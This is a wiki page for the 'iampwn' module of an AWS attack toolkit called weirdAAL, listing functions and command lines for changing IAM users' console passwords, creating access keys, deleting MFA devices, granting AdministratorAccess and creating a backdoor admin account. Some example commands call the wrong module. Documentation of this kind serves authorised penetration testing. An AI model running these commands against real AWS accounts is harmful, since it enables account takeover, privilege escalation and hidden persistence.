Skip to content

_modules_iampwn

Chris Gates edited this page May 15, 2018 · 1 revision

Functions

module_iam_change_user_console_password(*text)

change the console password for the specified user
python3 weirdAAL.py -m iam_change_user_console_password -a 'python','HackTh3Planet!' -t yolo

module_iam_check_root_account()

runs get_account_summary, list_users, for each user list_login_profiles() & list_mfa_devices()
python3 weirdAAL.py -m iam_check_root_account -t yolo

module_iam_create_access_key(*text)

create an access key for specfied user
python3 weirdAAL.py -m iam_create_access_key -a 'python' -t yolo

module_iam_create_user(*text)

create a IAM user with the specified username
python3 weirdAAL.py -m iam_delete_access_key -a 'urpwned' -t yolo

module_iam_delete_access_key(*text)

delete the specified access key for a specified user username,accesskeyid
python3 weirdAAL.py -m iam_delete_access_key -a 'python','AKIAEXAMPLEQ' -t yolo

module_iam_delete_mfa_device(*text)

delete specified MFA device for specified user - username,serialnum
python3 weirdAAL.py -m iam_delete_mfa_device -a 'python','arn:aws:iam::XXXXXXXXX:mfa/python' -t yolo

module_iam_get_account_summary()

Get account summmary for current user get_account_summary()
python3 weirdAAL.py -m iam_get_account_summary -t yolo

module_iam_get_password_policy()

runs IAM get_account_password_policy for the current user
python3 weirdAAL.py -m iam_get_password_policy -t yolo

module_iam_list_mfa_device(*text)

List MFA device for specified user
python3 weirdAAL.py -m iam_list_mfa_device -a python -t yolo

module_iam_make_admin(*text)

attach the admin policy ['arn:aws:iam::aws:policy/AdministratorAccess'] to the specified user
python3 weirdAAL.py -m iam_delete_access_key -a 'urpwned' -t yolo

module_iam_make_backdoor_account(*text)

calls the following functions:

iam_create_user(username)
iam_make_admin(username)
iam_create_user_console_password(username, password)
iam_create_access_key(username)

python3 weirdAAL.py -m iam_make_backdoor_account -a 'secureyershit','HackTh3Planet!' -t yolo